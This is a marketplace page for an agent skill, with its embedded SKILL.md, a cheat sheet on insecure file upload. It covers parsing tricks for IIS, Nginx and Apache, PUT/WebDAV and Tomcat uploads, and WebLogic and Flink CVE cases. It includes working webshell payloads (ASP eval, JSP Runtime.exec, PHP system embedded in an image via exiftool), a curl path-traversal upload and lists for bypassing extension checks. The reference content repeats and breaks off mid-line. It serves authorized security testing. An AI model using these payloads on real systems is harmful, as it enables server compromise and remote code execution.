Upload Insecure Files

Name: Upload Insecure Files
Author: yaklang

yaklang/hack-skills

Test and reason about insecure file-upload handling—including server parsing tricks and PUT-based uploads—during authorized app security reviews.

Overview

Upload Insecure Files is an agent skill for the Ship phase that catalogs insecure file-upload and server-parsing attack patterns—including IIS, Nginx, and Apache—for authorized security testing.

Install

npx skills add https://github.com/yaklang/hack-skills --skill upload-insecure-files

What is this skill?

Web server parsing matrix: IIS directory/semicolon tricks, Nginx CGI pathinfo, Apache multi-extension and CVE-2017-15715
.htaccess upload scenario to re-type extensions as executable handlers
Companion depth doc to main upload-insecure-files SKILL.md with extended scenarios and real-world cases
Documents exploitation flow from crafted filename upload through parser misconfiguration
Covers PUT method attack angles alongside classic multipart upload abuse
Parsing technique tables for IIS, Nginx, and Apache including CVE-2017-15715 newline bypass

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

What problem does it solve?

Your app accepts uploads but you are unsure whether extension allowlists actually prevent code execution when the web server parses paths or handlers incorrectly.

Who is it for?

Solo founders and small teams with file-upload features who run authorized security self-assessments or bug-bounty-style staging reviews.

Skip if: Builders who only need to implement S3 presigned uploads with no security review, or any unauthorized testing on third-party properties.

When should I use this skill?

Authorized security review of file upload endpoints when extended parsing, PUT, or CVE case studies beyond the main SKILL.md are needed.

What do I get? / Deliverables

You get structured upload and parsing test scenarios—plus CVE-relevant cases—to validate storage, handler config, and filename rules on systems you are permitted to test.

Parsing and upload test case list by server stack
Exploitation-flow hypotheses for manual verification

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

File-upload abuse is validated in Ship when you security-test endpoints, parsers, and storage paths before exposing uploads to real users. Security subphase covers vulnerability-oriented scenarios (IIS, Nginx, Apache parsing, .htaccess, CVE cases) rather than implementing a safe upload feature in Build.

How it compares

Offensive upload and parser cheat sheet for testers—not a secure-by-default upload implementation template.

Common Questions / FAQ

Who is upload-insecure-files for?

Developers and security-minded solo builders reviewing their own upload endpoints or testers with explicit authorization on the target application.

When should I use upload-insecure-files?

In Ship security when hardening or pen-testing avatar, document, or media upload flows before launch or after parser or server config changes.

Is upload-insecure-files safe to install?

It documents attack techniques for defensive testing—review the Security Audits panel on this page and restrict use to apps and environments you control or are engaged to assess.

SKILL.md

READMESKILL.md - Upload Insecure Files

# Upload Insecure Files — Extended Scenarios & Real-World Cases

> Companion to [SKILL.md](./SKILL.md). Contains parsing vulnerabilities, PUT method attacks, and CVE case studies.

---

## 1. Web Server Parsing Vulnerabilities

Parsing vulnerabilities cause web servers to execute uploaded files as code despite having "safe" extensions:

### IIS Parsing

| Technique | Example | Mechanism |
|---|---|---|
| Directory parsing | Upload to `x.asp/` directory | IIS 6 treats files in `.asp` directories as ASP |
| Semicolon truncation | `shell.asp;.jpg` | IIS 6 truncates at `;` → executes as ASP |
| Unicode space | `shell.asp%20` | IIS ignores trailing encoded space |

### Nginx Parsing (CGI misconfiguration)

```text
# Upload: avatar.jpg (containing PHP code in EXIF or appended)
# Access: /uploads/avatar.jpg/.php
# Or: /uploads/avatar.jpg%00.php (null byte, older versions)
```

Caused by `cgi.fix_pathinfo=1` in php.ini + incorrect Nginx `location` config.

### Apache Parsing

| Technique | Example | Mechanism |
|---|---|---|
| Multiple extensions | `shell.php.jpg` | If `AddHandler php-script .php`, Apache processes `.php` anywhere in name |
| Newline bypass (CVE-2017-15715) | `shell.php\n` (`0x0A`) | `<FilesMatch>` regex uses `$` which matches before `\n` |
| `.htaccess` upload | Upload `.htaccess` with `AddType application/x-httpd-php .jpg` | All `.jpg` files execute as PHP |

### Exploitation Flow

```
1. Upload file with parsing-vulnerable name: shell.php.jpg
2. Server stores it (passes extension validation for "jpg")
3. Access the file URL
4. Web server parses it as PHP due to parsing vulnerability → RCE
```

---

## 2. PUT Method Exploitation

### IIS PUT + COPY/MOVE

IIS with WebDAV and write permissions allows uploading via PUT, then renaming:

```bash
# Step 1: PUT a text file (allowed)
PUT /test.txt HTTP/1.1
Content-Type: text/plain

<%eval request("cmd")%>

# Step 2: COPY/MOVE to .asp extension
COPY /test.txt HTTP/1.1
Destination: /shell.asp

# Step 3: Access shell
GET /shell.asp?cmd=whoami
```

### Tomcat PUT (CVE-2017-12615)

When Tomcat's `readonly` parameter is `false` in `web.xml`:

```bash
# Direct PUT is blocked for .jsp
PUT /shell.jsp HTTP/1.1
→ 403 Forbidden

# Bypass with trailing slash:
PUT /shell.jsp/ HTTP/1.1
Content-Type: application/octet-stream

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
→ 201 Created

# Or Windows-style:
PUT /shell.jsp::$DATA HTTP/1.1
```

---

## 3. CVE Case: WebLogic Arbitrary File Upload (CVE-2018-2894)

WebLogic's Web Service Test Page allows unauthenticated file upload:

```
# Endpoint (when test page is enabled):
/ws_utc/config.do
# Or: /ws_utc/resources/setting/keystore

# Upload JSP webshell as a "keystore" file
# The file is stored in a web-accessible path
# Access: /ws_utc/css/config/keystore/TIMESTAMP_FILENAME.jsp
```

---

## 4. CVE Case: Apache Flink File Upload (CVE-2020-17518)

Flink's REST API allows uploading JARs with path traversal in the filename:

```bash
# Upload with crafted filename containing path traversal:
curl -X POST http://TARGET:8081/jars/upload \
  -F 'jarfile=@shell.jar;filename=../../../../../../tmp/shell.jar'
```

---

## 5. File Upload + Parsing Vulnerability Chain

The most reliable upload-to-RCE chain combines both:

```
1. Upload: image with PHP code embedded (e.g., in EXIF Comment)
   exiftool -Comment='<?php system($_GET["c"]); ?>' photo.jpg

2. Exploit parsing vulnerability to execute as PHP:
   - Nginx: /uploads/photo.jpg/.php
   - Apache: rename to photo.php.jpg
   - IIS: upload to x.asp/ directory

3. Access with command parameter:
   GET /uploads/photo.jpg/.php?c=id
```

---

## 6. Extension Bypass Reference

```text
# PHP alternatives:
.php  .php3  .php4  .php5  .phtml  .pht  .phps  .phar

# ASP alternatives:
.asp  .aspx  .asa  .cer  .cdx  .ashx  .asmx

# JSP alternatives:
.jsp  .jspx  .jsw  .jsv  .jspf

# Case variations:
.pHp  .PhP  .PHP  .Asp  .aSp

# Double extensions:
.php.jpg  .php.png  .php.txt  .asp;.jpg

# Null byte (le

What is this skill?

Web server parsing matrix: IIS directory/semicolon tricks, Nginx CGI pathinfo, Apache multi-extension and CVE-2017-15715

.htaccess upload scenario to re-type extensions as executable handlers

Companion depth doc to main upload-insecure-files SKILL.md with extended scenarios and real-world cases

Documents exploitation flow from crafted filename upload through parser misconfiguration

Covers PUT method attack angles alongside classic multipart upload abuse

Parsing technique tables for IIS, Nginx, and Apache including CVE-2017-15715 newline bypass

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Upload Insecure Files

# Upload Insecure Files — Extended Scenarios & Real-World Cases

> Companion to [SKILL.md](./SKILL.md). Contains parsing vulnerabilities, PUT method attacks, and CVE case studies.

---

## 1. Web Server Parsing Vulnerabilities

Parsing vulnerabilities cause web servers to execute uploaded files as code despite having "safe" extensions:

### IIS Parsing

| Technique | Example | Mechanism |
|---|---|---|
| Directory parsing | Upload to `x.asp/` directory | IIS 6 treats files in `.asp` directories as ASP |
| Semicolon truncation | `shell.asp;.jpg` | IIS 6 truncates at `;` → executes as ASP |
| Unicode space | `shell.asp%20` | IIS ignores trailing encoded space |

### Nginx Parsing (CGI misconfiguration)

```text
# Upload: avatar.jpg (containing PHP code in EXIF or appended)
# Access: /uploads/avatar.jpg/.php
# Or: /uploads/avatar.jpg%00.php (null byte, older versions)
```

Caused by `cgi.fix_pathinfo=1` in php.ini + incorrect Nginx `location` config.

### Apache Parsing

| Technique | Example | Mechanism |
|---|---|---|
| Multiple extensions | `shell.php.jpg` | If `AddHandler php-script .php`, Apache processes `.php` anywhere in name |
| Newline bypass (CVE-2017-15715) | `shell.php\n` (`0x0A`) | `<FilesMatch>` regex uses `$` which matches before `\n` |
| `.htaccess` upload | Upload `.htaccess` with `AddType application/x-httpd-php .jpg` | All `.jpg` files execute as PHP |

### Exploitation Flow

```
1. Upload file with parsing-vulnerable name: shell.php.jpg
2. Server stores it (passes extension validation for "jpg")
3. Access the file URL
4. Web server parses it as PHP due to parsing vulnerability → RCE
```

---

## 2. PUT Method Exploitation

### IIS PUT + COPY/MOVE

IIS with WebDAV and write permissions allows uploading via PUT, then renaming:

```bash
# Step 1: PUT a text file (allowed)
PUT /test.txt HTTP/1.1
Content-Type: text/plain

<%eval request("cmd")%>

# Step 2: COPY/MOVE to .asp extension
COPY /test.txt HTTP/1.1
Destination: /shell.asp

# Step 3: Access shell
GET /shell.asp?cmd=whoami
```

### Tomcat PUT (CVE-2017-12615)

When Tomcat's `readonly` parameter is `false` in `web.xml`:

```bash
# Direct PUT is blocked for .jsp
PUT /shell.jsp HTTP/1.1
→ 403 Forbidden

# Bypass with trailing slash:
PUT /shell.jsp/ HTTP/1.1
Content-Type: application/octet-stream

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
→ 201 Created

# Or Windows-style:
PUT /shell.jsp::$DATA HTTP/1.1
```

---

## 3. CVE Case: WebLogic Arbitrary File Upload (CVE-2018-2894)

WebLogic's Web Service Test Page allows unauthenticated file upload:

```
# Endpoint (when test page is enabled):
/ws_utc/config.do
# Or: /ws_utc/resources/setting/keystore

# Upload JSP webshell as a "keystore" file
# The file is stored in a web-accessible path
# Access: /ws_utc/css/config/keystore/TIMESTAMP_FILENAME.jsp
```

---

## 4. CVE Case: Apache Flink File Upload (CVE-2020-17518)

Flink's REST API allows uploading JARs with path traversal in the filename:

```bash
# Upload with crafted filename containing path traversal:
curl -X POST http://TARGET:8081/jars/upload \
  -F 'jarfile=@shell.jar;filename=../../../../../../tmp/shell.jar'
```

---

## 5. File Upload + Parsing Vulnerability Chain

The most reliable upload-to-RCE chain combines both:

```
1. Upload: image with PHP code embedded (e.g., in EXIF Comment)
   exiftool -Comment='<?php system($_GET["c"]); ?>' photo.jpg

2. Exploit parsing vulnerability to execute as PHP:
   - Nginx: /uploads/photo.jpg/.php
   - Apache: rename to photo.php.jpg
   - IIS: upload to x.asp/ directory

3. Access with command parameter:
   GET /uploads/photo.jpg/.php?c=id
```

---

## 6. Extension Bypass Reference

```text
# PHP alternatives:
.php  .php3  .php4  .php5  .phtml  .pht  .phps  .phar

# ASP alternatives:
.asp  .aspx  .asa  .cer  .cdx  .ashx  .asmx

# JSP alternatives:
.jsp  .jspx  .jsw  .jsv  .jspf

# Case variations:
.pHp  .PhP  .PHP  .Asp  .aSp

# Double extensions:
.php.jpg  .php.png  .php.txt  .asp;.jpg

# Null byte (le

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is upload-insecure-files for?

When should I use upload-insecure-files?

Is upload-insecure-files safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is upload-insecure-files for?

When should I use upload-insecure-files?

Is upload-insecure-files safe to install?

SKILL.md